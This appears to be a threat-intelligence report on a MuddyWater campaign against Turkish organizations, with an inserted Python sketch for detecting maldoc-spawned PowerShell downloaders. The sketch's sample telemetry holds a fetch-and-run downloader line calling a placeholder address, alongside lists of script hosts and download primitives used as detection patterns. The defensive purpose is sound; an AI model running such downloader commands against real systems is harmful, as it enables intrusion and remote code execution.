By Asheer Malhotra and Vitor Ventura.
- Cisco Talos has observed a new campaign targeting Turkish private organizations alongside governmental institutions.
- Talos attributes this campaign with high confidence to MuddyWater — an APT group recently attributed to Iran's Ministry of Intelligence and Security (MOIS) by the U.S. Cyber Command.
- This campaign uses malicious PDFs, XLS files and Windows executables to deploy obfuscated PowerShell-based downloaders that act as the initial foothold in the target's enterprise. MuddyWater's use of script-based components such as obfuscated PowerShell downloaders is also a tactic described in the U.S. Cyber Command advisory from January 2022.
- This campaign also utilizes canary tokens to track successful infection of targets, a new addition to this group's arsenal of tactics, techniques and procedures (TTPs).
- The way canary tokens are used in this campaign may also serve to evade sandbox-based detection systems.
- A highly motivated threat actor such as MuddyWater can use this unauthorized access to conduct espionage and intellectual property theft, and to deploy ransomware and destructive malware in an enterprise.
Executive summary
MuddyWater has conducted various campaigns against entities across the U.S., Europe, the Middle East and South Asia.
A typical TTP employed by the group is heavy use of scripting in its infection chains, in languages such as PowerShell and Visual Basic, coupled with frequent use of living-off-the-land binaries (LoLBins).
Cisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign uses malicious PDFs and Microsoft Office documents (maldocs) as the initial infection vector. The maldocs were named so as to masquerade as legitimate documents from the Turkish Health and Interior Ministries.
Next, the malware executes a series of scripts on the infected endpoint that serve as downloaders and instrumentation for additional payloads.
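The chain summarized above (a document reader opens a maldoc, which launches a script host acting as an obfuscated downloader) is something a defender can hunt for in process-creation telemetry. The following detection sketch is an added example, not Talos's code and not a detector for this specific campaign: it flags document readers spawning script hosts or LoLBins, decodes PowerShell `-EncodedCommand` payloads (UTF-16LE base64) so obfuscated command lines can be inspected, and looks for download primitives in the effective command. The pipe-delimited log format, process names and sample events are constructed for the example, not taken from real telemetry.

```python
"""Detection sketch for maldoc -> script-host -> downloader chains.

Added example, not code from the original post or from Talos. The
'parent|image|commandline' record format and all sample events below are
constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass

# Document readers that should not normally spawn script hosts (assumed list).
DOCUMENT_READERS = {
    "winword.exe", "excel.exe", "powerpnt.exe",
    "acrord32.exe", "acrobat.exe", "foxitreader.exe",
}
# Script hosts and LoLBins commonly chained in script-heavy infections (assumed list).
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}
# Substrings that indicate a script is fetching a further stage.
DOWNLOADER_HINTS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
    "net.webclient", "bitsadmin", "http://", "https://",
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e, -en, -enc, -ec all work.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand|ec)\s+([A-Za-z0-9+/=]{16,})")


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed 'parent|image|commandline' record; paths are lowercased."""
    parent, image, cmdline = line.split("|", 2)
    return ProcessEvent(parent.strip().lower(), image.strip().lower(), cmdline.strip())


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script (UTF-16LE base64), or None if absent/invalid."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def evaluate(event: ProcessEvent) -> list:
    """Return the findings for one process-creation event (empty list if benign)."""
    findings = []
    parent = event.parent_image.rsplit("\\", 1)[-1]
    image = event.image.rsplit("\\", 1)[-1]
    if parent in DOCUMENT_READERS and image in SCRIPT_HOSTS:
        findings.append(f"document reader {parent} spawned script host {image}")
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        findings.append("encoded PowerShell command")
    # Inspect the decoded script when present; otherwise the raw command line.
    effective = (decoded if decoded is not None else event.command_line).lower()
    if image in SCRIPT_HOSTS and any(hint in effective for hint in DOWNLOADER_HINTS):
        findings.append("downloader behaviour in script host command line")
    return findings


def scan(lines) -> list:
    """Return (index, findings) for every record that produced at least one finding."""
    results = []
    for idx, line in enumerate(lines):
        findings = evaluate(parse_event(line))
        if findings:
            results.append((idx, findings))
    return results


# Constructed sample telemetry. The stage-2 URL uses a TEST-NET address, not a real host.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_LINES = [
    "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    f"powershell.exe -NoP -W Hidden -Enc {SAMPLE_ENCODED}",
    "C:\\Windows\\explorer.exe|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -NoLogo",
    "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe|"
    "C:\\Windows\\System32\\wscript.exe|"
    "wscript.exe //B C:\\Users\\Public\\update.vbs",
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_LINES):
        print(f"event {idx}: {'; '.join(findings)}")
```

The interactive PowerShell launched from explorer.exe produces no finding, while the Excel-spawned encoded downloader yields three and the Acrobat-spawned VBScript yields one (parent/child relationship only). In production the same logic would run over Sysmon Event ID 1 or EDR process-creation events rather than a constructed pipe-delimited format, and the reader and host lists would be tuned to the environment.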
We also discovered the use of flags or tokens in the attacks this threat actor conducted in this campaign. These tokens signal to the group that its malicious artifacts have successfully infected a target.